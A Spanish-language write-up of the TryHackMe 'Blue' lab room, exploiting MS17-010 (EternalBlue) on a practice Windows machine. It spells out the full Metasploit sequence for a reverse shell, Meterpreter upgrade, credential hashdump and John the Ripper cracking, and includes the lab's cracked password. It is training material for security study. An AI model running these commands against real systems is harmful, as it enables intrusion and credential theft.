Blue [TryHackMe]
2023-08-27
Introducción
Se trata de la segunda máquina de la serie “Offensive Pentesting” de TryHackMe, que se centra en la explotación de la vulnerabilidad EternalBlue en sistemas Windows. Es una sala sencilla, destinada a familiarizarse con el reconocimiento, la explotación y el escalamiento de privilegios en sistemas Windows y en uso de Metasploit y Meterpreter.
Task 1 - Reconocimiento
Paso 1: Enumeración de Puertos
- Realizo un escaneo de puertos con Nmap para identificar los puertos abiertos.
- Descubro que el puerto 445 (SMB) estaba abierto en el objetivo.
- Encuentro una vulnerabilidad conocida en el servicio SMB, MS17-010.
Comando Nmap:
nmap -sV --script vuln -p- 10.10.185.150
Task 2 - Explotación
Paso 2: Identificación de Vulnerabilidad
- Investigo sobre la vulnerabilidad MS17-010 y su explotación potencial.
- Busco el módulo “ms17_010_eternalblue” de Metasploit y lo selecciono.
Herramienta Metasploit:
use windows/smb/ms17_010_eternalblue
Paso 3: Explotación
- Configuro Metasploit con mi dirección IP como host.
- Ejecuto el exploit para obtener acceso en el sistema objetivo.
- Consigo una shell inversa y la con Meterpreter.
Comandos Metasploit:
set RHOSTS 10.10.185.150
set LHOST <mi dirección IP>
exploit
Task 3 - Escalamiento de Privilegios
Paso 4: Escalamiento de Privilegios
- Busco la manera de escalar privilegios y convertir la shell en una sesión de Meterpreter.
- Utilizo el módulo “shell_to_meterpreter” de Metasploit para lograrlo.
Comandos Metasploit:
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION <número de sesión>
exploit
Task 4 - Descifrando Contraseñas
Paso 5: Extracción de Contraseñas
- Con Meterpreter, ejecuto el comando “hashdump” para extraer las contraseñas almacenadas en el sistema.
Comando Meterpreter:
hashdump
Paso 6: Descifrando Contraseña
- Copio el hash de contraseña de un usuario no predeterminado y utilizo John the Ripper para descifrarlo.
- La contraseña descifrada resultante es “alqfna22”.
Comandos John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hashdump.txt --format=NT
Task 5 - Búsqueda de Banderas
Paso 7: Búsqueda de Banderas
- Utilizo el comando “search” en Meterpreter para encontrar las ubicaciones de las banderas en el sistema.
- Descubro las siguientes banderas:
c:\\flag1.txt
(ubicada en la raíz del sistema)c:\\Windows\\System32\\config\\flag2.txt
(ubicada en la carpeta de configuración)c:\\Users\\Jon\\Documents\\flag3.txt
(ubicada en la carpeta de documentos de un usuario)
Comando Meterpreter:
search -f flag*.txt
Paso 8: Exploración de Banderas
- Uso “cat” para mostrar el contenido de las banderas y encontrar las respuestas a las preguntas de la sala:
Comando Meterpreter:
cat c:\\flag1.txt
Conclusión
Se trata de una máquina muy sencilla, ya que se cubren los aspectos clave de la enumeración, la explotación de vulnerabilidades, el escalamiento de privilegios, la extracción y el descifrado de contraseñas, y la búsqueda de ficheros en sistemas Windows.